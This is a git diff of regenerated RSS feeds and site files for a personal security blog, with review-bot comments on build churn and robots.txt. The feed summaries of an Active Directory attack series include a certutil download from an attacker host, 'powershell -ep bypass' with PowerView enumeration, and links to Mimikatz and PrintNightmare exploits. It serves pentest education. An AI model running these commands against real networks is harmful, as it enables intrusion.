-This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
+ First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
-
-
HoneyTrack
https://auti.dev/honeytrack/
Sat, 19 Aug 2023 14:28:54 +0530
-
https://auti.dev/honeytrack/
- Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
-HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
+ Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
-
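Review bot: the re-added HoneyTrack description (the `+ Honeypot with a twist of Red Teaming` line and the line after it) still carries wording that reads as unfinished: "Honeypots are one of the most concerned topics" and "as well it backtracks the hacker when it intrudes the target network". Since the line is being regenerated anyway, fix the sentences in the source post under content/ and rebuild, so the correction reaches every feed that lists this post.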
diff --git a/public/blog/web-security/index.xml b/public/blog/web-security/index.xml
index 5ce8377..91ee67d 100644
--- a/public/blog/web-security/index.xml
+++ b/public/blog/web-security/index.xml
@@ -1,22 +1,20 @@
- web-security on auti.dev ≽^._.^≼ ∫
+ Web-Security on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/web-security/
- Recent content in web-security on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Web-Security on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Wed, 15 Feb 2023 12:22:44 +0530
+ Wed, 15 Feb 2023 12:22:44 +0530
+
-
OWASP Top 10
https://auti.dev/owasp-top-10/
Wed, 15 Feb 2023 12:22:44 +0530
-
https://auti.dev/owasp-top-10/
- First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
-I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
+ First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
-
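Review bot: two changes at the top of this hunk look like side effects of the rebuild rather than content edits: the channel title goes from `web-security` to `Web-Security`, and the generator string from `Hugo -- gohugo.io` to `Hugo`. If the capitalised term title is intended, say so in the commit message; otherwise set the title for the taxonomy term explicitly, and pin the Hugo version used for the build so generated output does not shift between commits. The OWASP Top 10 description is removed and re-added with the same visible text, so that part of the hunk is churn.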
diff --git a/public/blog/windows/index.xml b/public/blog/windows/index.xml
index e1a6e2c..78f75cc 100644
--- a/public/blog/windows/index.xml
+++ b/public/blog/windows/index.xml
@@ -1,85 +1,48 @@
- windows on auti.dev ≽^._.^≼ ∫
+ Windows on auti.dev ≽^._.^≼ ∫
https://auti.dev/blog/windows/
- Recent content in windows on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Recent content in Windows on auti.dev ≽^._.^≼ ∫
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Fri, 20 Aug 2021 12:35:53 +0530
+ Fri, 20 Aug 2021 12:35:53 +0530
+
-
Useful AD Resources
https://auti.dev/useful-ad-resources/
Fri, 20 Aug 2021 12:35:53 +0530
-
https://auti.dev/useful-ad-resources/
- Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
-Mitm6: https://github.com/fox-it/mitm6
-Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
-Mimikatz: https://github.com/gentilkiwi/mimikatz
-PRET: https://github.com/RUB-NDS/PRET
-Praeda: https://github.com/percx/Praeda
-SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
-LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
-cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
-calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
-Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
-Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
-mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
-Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
-Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
-A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
-Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
-GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
+ Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
Mitm6: https://github.com/fox-it/mitm6
Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
Mimikatz: https://github.com/gentilkiwi/mimikatz
PRET: https://github.com/RUB-NDS/PRET
Praeda: https://github.com/percx/Praeda
SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
-
-
Compromising AD - Part 4: Post Exploitation
https://auti.dev/compromising-ad-part-4-post-exploitation/
Tue, 17 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-4-post-exploitation/
- Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
-certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
-python -m SimpleHTTPServer [port] Browser
-Navigate directly to the file (%20 for spaces) FTP
-On Attacker Machine
-python -m pyftpdlib 21 On Victim Machine, Browse to
+ Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
python -m SimpleHTTPServer [port] Browser
Navigate directly to the file (%20 for spaces) FTP
On Attacker Machine
python -m pyftpdlib 21 On Victim Machine, Browse to
-
-
Compromising AD - Part 3: Post Compromise Attacks
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Mon, 16 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks!
-
-
Compromising AD - Part 2: Post Compromise Enumeration
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
Sun, 15 Aug 2021 12:37:53 +0530
-
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
- Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Enumeration Load up a command prompt and cd into Downloads
-powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
-. .\Powerview.ps1 Fundamental Commands
-Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
+ Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Enumeration Load up a command prompt and cd into Downloads
powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
. .\Powerview.ps1 Fundamental Commands
Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
-
-
Compromising AD - Part 1: Initial Attack Vectors
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
Sun, 15 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
- Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
-Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
+ Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
-
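Review bot: the item descriptions for Parts 2, 3 and 4 are each post's table of contents run together with its first commands (for example `Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting ...`), and that is what feed readers will show as the summary. Give those posts an explicit summary in front matter, or a summary divider after an introductory paragraph, so the description reads as a sentence the way Part 1's does. Separately, the `LAPS:` line in the Useful AD Resources item ends with `))`, one closing parenthesis too many, and it is carried over unchanged onto the `+` side.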
diff --git a/public/index.xml b/public/index.xml
index 6b44df0..3495679 100644
--- a/public/index.xml
+++ b/public/index.xml
@@ -4,121 +4,73 @@
auti.dev ≽^._.^≼ ∫
https://auti.dev/
Recent content on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Tue, 17 Oct 2023 12:35:53 +0530
+ Tue, 17 Oct 2023 12:35:53 +0530
+
-
Demystifying Elastic SIEM
https://auti.dev/demystifying-elastic-siem/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/demystifying-elastic-siem/
Introduction Hey there! Following my recent presentation at the Elastic Community Event, I’m thrilled to extend the insights into setting up Elastic for cybersecurity tools. In this blog, we’ll take a hands-on approach, providing a detailed guide on leveraging Elasticsearch and its toolkit. Our focus? Building a robust Security Information and Event Management (SIEM) tool, seamlessly incorporating Suricata, Wazuh, Windows Sysmon, network packet capture, and Apache Webserver. All of this orchestrated within the dependable Proxmox stack and Debian server containers.
-
-
Leveraging Cybersecurity using ElasticSearch
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
- First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
-This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
+ First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
-
-
HoneyTrack
https://auti.dev/honeytrack/
Sat, 19 Aug 2023 14:28:54 +0530
-
https://auti.dev/honeytrack/
- Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
-HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
+ Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
-
-
OWASP Top 10
https://auti.dev/owasp-top-10/
Wed, 15 Feb 2023 12:22:44 +0530
-
https://auti.dev/owasp-top-10/
- First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
-I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
+ First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
-
-
Useful AD Resources
https://auti.dev/useful-ad-resources/
Fri, 20 Aug 2021 12:35:53 +0530
-
https://auti.dev/useful-ad-resources/
- Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
-Mitm6: https://github.com/fox-it/mitm6
-Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
-Mimikatz: https://github.com/gentilkiwi/mimikatz
-PRET: https://github.com/RUB-NDS/PRET
-Praeda: https://github.com/percx/Praeda
-SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
-LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
-cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
-calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
-Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
-Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
-mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
-Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
-Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
-A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
-Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
-GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
+ Downloads and Tools Impacket Tools: https://github.com/SecureAuthCorp/impacket/releases
Mitm6: https://github.com/fox-it/mitm6
Powerview: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Sharphound: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
Mimikatz: https://github.com/gentilkiwi/mimikatz
PRET: https://github.com/RUB-NDS/PRET
Praeda: https://github.com/percx/Praeda
SYSVOL Script: (https://support.microsoft.com/en-us/kb/2962486)
LAPS: (https://www.microsoft.com/en-us/download/details.aspx?id=46899))
cube0x0 RCE: https://github.com/cube0x0/CVE-2021-1675
calebstewart LPE: https://github.com/calebstewart/CVE-2021-1675
Articles and Blogs Top 5 ways I got Domain: https://adam-toscher.medium.com/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa
Account tiering: https://www.ravenswoodtechnology.com/how-to-mitigate-privilege-escalation-with-the-tiered-access-model-for-active-directory-security/
mitm6: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/
Combining NTLM Relays and Kerberos Delegation: https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/
Hacking Printers Cheatsheet: http://www.hacking-printers.net/wiki/index.php/Printer_Security_Testing_Cheat_Sheet
A Pen Tester’s Guide to Printer Hacking: https://www.mindpointgroup.com/blog/how-to-hack-through-a-pass-back-attack/
Bypass Antivirus: https://sushant747.gitbooks.io/total-oscp-guide/content/bypassing_antivirus.html
GPP cPassword Attack: https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/
-
-
Compromising AD - Part 4: Post Exploitation
https://auti.dev/compromising-ad-part-4-post-exploitation/
Tue, 17 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-4-post-exploitation/
- Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
-certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
-python -m SimpleHTTPServer [port] Browser
-Navigate directly to the file (%20 for spaces) FTP
-On Attacker Machine
-python -m pyftpdlib 21 On Victim Machine, Browse to
+ Post Exploitation Post Exploitation File-Transfers Maintaining-Access Pivoting Setup and Pivot! Cleanup Make the system/network as it was when you entered it. Next >> Useful Active Directory Resources File-Transfers Certutil
certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt HTTP - Change to the directory you want to host
python -m SimpleHTTPServer [port] Browser
Navigate directly to the file (%20 for spaces) FTP
On Attacker Machine
python -m pyftpdlib 21 On Victim Machine, Browse to
-
-
Compromising AD - Part 3: Post Compromise Attacks
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Mon, 16 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-3-post-compromise-attacks/
Post-Compromise Attacks Post-Compromise Attacks passthehash ??? WTF Mitigations Token-Impersonation What are tokens? Two types Setup Mitigations Kerberoasting Kerberoast? Mitigations GPP-cPassword-Attacks Group Policy Preferences Attack aka MS14-025 Resources Setup Exploiting “Active” Machine on HacktheBox Privesc that Machine! Mitigations URL-File-Attacks SCF and URL file attack against writeable share Mitigations Print-Nightmare Resources Exploit Mitigation - just disable the damn service! Installation Exploit Mimikatz What’s that? Resources Exploit Golden-Ticket-Attack What is a Golden Ticket? Exploit Mitigations Zero-Logon aka CVE-2020-1472 Resources Exploit Mitigations Next >> Part 4: Post Exploitation passthehash If we crack a password and/or dump the SAM Hashes, we can leverage both for lateral movement in networks!
-
-
Compromising AD - Part 2: Post Compromise Enumeration
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
Sun, 15 Aug 2021 12:37:53 +0530
-
https://auti.dev/compromising-ad-part-2-post-compromise-enumeration/
- Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
-Enumeration Load up a command prompt and cd into Downloads
-powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
-. .\Powerview.ps1 Fundamental Commands
-Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
+ Post Compromise Enumeration Post Compromise Enumeration Powerview Requirements Enumeration Bloodhound Setup Enumeration Next >> Part 3: Post Compromise Attacks Powerview Requirements https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
Enumeration Load up a command prompt and cd into Downloads
powershell -ep bypass -ep is ExecutionPolicy (Stops us from executing scripts) bypass - bypass :) Load PowerView
. .\Powerview.ps1 Fundamental Commands
Get-NetDomain //Returns information about the domain Get-NetDomainController // Returns Information about DC Get-DomainPolicy // Returns Domain Policies such as Kerberos Policy, System Access, Version, Registry Values (Get-DomainPolicy).
-
-
Compromising AD - Part 1: Initial Attack Vectors
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
Sun, 15 Aug 2021 12:35:53 +0530
-
https://auti.dev/compromising-ad-part-1-initial-attack-vectors/
- Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
-Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
+ Introduction In the digital landscape, Active Directory (AD) is the cornerstone of network identity and access management, exerting immense power within an organization’s infrastructure.
Yet, as the heartbeat of user authentication and authorization, it presents an enticing target for cyber adversaries seeking entry points to exploit. This four-part blog series ventures into the maze of Active Directory compromises, sketching insights from the TCM Security course to describe the vulnerabilities, attack vectors, and crucially, robust strategies for fortification and defense.
-
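Review bot: this hunk shrinks from 121 to 73 lines while the visible text of each description is the same on the `-` and `+` sides, so the review cannot tell what actually changed in the feed; the same pattern repeats in the per-section feeds. public/ is build output: consider adding it to .gitignore and building at deploy time, so commits show only the content/ change that caused the rebuild. If public/ has to stay in the repository, record the generator version in the commit message so the churn can be explained.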
diff --git a/public/project/index.xml b/public/project/index.xml
index c4cc342..8a9a555 100644
--- a/public/project/index.xml
+++ b/public/project/index.xml
@@ -4,19 +4,17 @@
Projects on auti.dev ≽^._.^≼ ∫
https://auti.dev/project/
Recent content in Projects on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Sat, 19 Aug 2023 14:28:54 +0530
+ Sat, 19 Aug 2023 14:28:54 +0530
+
-
HoneyTrack
https://auti.dev/honeytrack/
Sat, 19 Aug 2023 14:28:54 +0530
-
https://auti.dev/honeytrack/
- Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
-HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
+ Honeypot with a twist of Red Teaming With the tremendous growth of cyber-attacks, the loss of private or sensitive data has risen to a peak. Honeypots are one of the most concerned topics in the field of cyber security currently.
HoneyTrack is a honeypot cum SIEM tool that uses various technologies like Docker, Shell Scripts, Python, Elastic Search 🔍, Kibana 📈, and Filebeat 📂 which protect an organization’s database as well it backtracks the hacker when it intrudes the target network.
-
diff --git a/public/robots.txt b/public/robots.txt
index f873529..4f9540b 100644
--- a/public/robots.txt
+++ b/public/robots.txt
@@ -1,2 +1 @@
-User-Agent: *
-Sitemap: https://auti.dev/sitemap.xml
+User-agent: *
\ No newline at end of file
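Review bot: the `Sitemap: https://auti.dev/sitemap.xml` line is dropped here while public/sitemap.xml is still updated in the same commit, so crawlers lose the pointer to it. If that is unintended, restore the line through the site's robots.txt template rather than editing public/ by hand. The new file is also a lone `User-agent: *` group with no `Allow` or `Disallow` rule and no trailing newline; add an explicit `Disallow:` line (empty to allow everything) and end the file with a newline.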
diff --git a/public/sitemap.xml b/public/sitemap.xml
index 16ca954..3e3b664 100644
--- a/public/sitemap.xml
+++ b/public/sitemap.xml
@@ -4,7 +4,6 @@
https://auti.dev/
2023-10-17T12:35:53+05:30
- 0
https://auti.dev/blog/
2023-10-17T12:35:53+05:30
diff --git a/public/talk/index.xml b/public/talk/index.xml
index ebd1964..10ba212 100644
--- a/public/talk/index.xml
+++ b/public/talk/index.xml
@@ -4,29 +4,24 @@
Talks on auti.dev ≽^._.^≼ ∫
https://auti.dev/talk/
Recent content in Talks on auti.dev ≽^._.^≼ ∫
- Hugo -- gohugo.io
+ Hugo
en-US
Copyright © 2023, Atharva Auti.
- Tue, 17 Oct 2023 12:35:53 +0530
+ Tue, 17 Oct 2023 12:35:53 +0530
+
-
Leveraging Cybersecurity using ElasticSearch
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
Tue, 17 Oct 2023 12:35:53 +0530
-
https://auti.dev/leveraging-cybersecurity-using-elasticsearch/
- First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
-This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
+ First talk on 14th October 2023, at Elastic Community Event, Mumbai Presentation: docs.google.com
This talk is all about how one can leverage Cybersecurity and create awesome tools and integrations using ElasticSearch’s builtin integrations. These integrations can be used with pre-existing open source as well as proprietary Cybersecurity tools like Suricata, Snort, etc. Not only specialized cybersecurity tools, but also Apache Web Server integration that can monitor an Apache2 instance for access and error logs.
-
-
OWASP Top 10
https://auti.dev/owasp-top-10/
Wed, 15 Feb 2023 12:22:44 +0530
-
https://auti.dev/owasp-top-10/
- First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
-I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
+ First talk on 15th February 2023, as a guest lecture on Ethical Hacking and Digital Forensics Presentation: docs.google.com
I had the privilege of presenting a talk at SAKEC, Mumbai University, diving deep into the intricate workings of web applications while shedding light on the critical vulnerabilities outlined in the OWASP top 10. Through interactive demonstrations, I explained the underlying mechanics of web applications and elucidated strategies to mitigate these vulnerabilities, empowering the audience with actionable insights to secure their web applications.
-